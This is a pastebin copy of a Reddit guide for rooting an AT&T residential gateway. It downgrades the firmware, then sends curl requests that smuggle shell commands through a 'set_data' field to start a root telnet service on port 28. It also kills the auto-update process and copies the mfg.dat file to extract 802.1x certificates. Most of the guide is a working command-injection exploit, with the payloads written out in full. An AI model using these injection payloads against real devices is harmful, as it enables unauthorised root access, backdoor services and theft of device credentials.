Copied as a verbatim backup from pastebin:

Original reddit thread:


#Send me a message @ if you need any help following these instructions. 

#Shout out to Earlz for offering insight into how the NVG510 was exploited before. 

Downgrade to this firmware: mirror:

Once downgraded, go to , type your device access code to login, and assign a static IP to your PC that you'll be executing the CURL commands from.

Once you assign a static IP,  refresh your PC's local ip address. using ifconfig, or ipconfig if on windows (cmd prompt: ipconfig /release and then ipconfig /renew)

Once that's done, open and authenticate again 

Once you authenticate, run these CURL(you'll need to download CURL) commands from your command prompt while keeping the router config page open in a browser: 

(tech has no password when prompted)

curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| echo 28telnet stream tcp nowait root /usr/sbin/telnetd -i -l /bin/nsh > /var/etc/inetd.d/telnet28|" -v --http1.1

curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -a /var/etc/inetd.d/telnet28|" -v --http1.1

curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| pfs -s|" -v --http1.1

curl -k -u tech -H "User-Agent: blah" -H "Connection:Keep-Alive" -d "appid=001&set_data=| reboot|" -v --http1.1

Router will reboot after the final command, and you'll be able to telnet on port 28 as Admin w/ device access code as the password once it reboots. 

(Use Putty if using a Windows PC)

Once you're logged in via telnet, type ! and press enter to elevate to a root sh terminal

Now, type top and let the telnet terminal populate with the running processes of the router. 

Once the top command displays all of the running process, look for a process labelled:   /usr/bin/udpsvd -E 0 69 tftpd /lib/firmware

Press CTRL + C to break out of the top command.

type kill PID_number_of_udpsvd; For example: kill 1102

This kills the auto update script so that you can make changes, or copy your 802.11x certificates without the ATT firmware automatically updating when you aren't ready for it. 


Successful CURL command looks like this:



If you receive a <status>You are not authorized to view this page</status> message, you need to go back to step 2, assign a new IP to your CURL command prompt PC, and follow the rest of the guide in order. 

***This is the most reliable way I've found to allow command injection once the "Not authorized to view this page" status occurs.

Various commands to run from root shell:

Make root file system writable: 

mount -o remount,rw /dev/ubi0 /   

echo "15000 61000" > /proc/sys/net/ipv4/ip_local_port_range  ####INCREASE CONNECTION NUMBER IN IP TABLES

echo "30" > /proc/sys/net/ipv4/tcp_fin_timeout               ####REDUCE TIME OUT TIME FOR CONNECTIONS

echo "1" > /proc/sys/net/ipv4/tcp_tw_recycle | echo "1" > /proc/sys/net/ipv4/tcp_tw_reuse  ### TCP TW REUSE/RECYCLE ENABLE

echo "1024" > /proc/sys/net/core/somaxconn  #### MAX CONNECTIONS ON SOCKET

echo "30000" > /proc/sys/net/netfilter/nf_conntrack_max  ### INCREASE NAT CONNECTIONS FROM DEFAULT 8192 to 30000


MFG.dat for certificate extraction:

mount -o remount,rw /dev/ubi0 /   

mount mtd:mfg -t jffs2 /mfg

cp /mfg/mfg.dat /www/att/mfg.dat

enter in browser and save as .dat file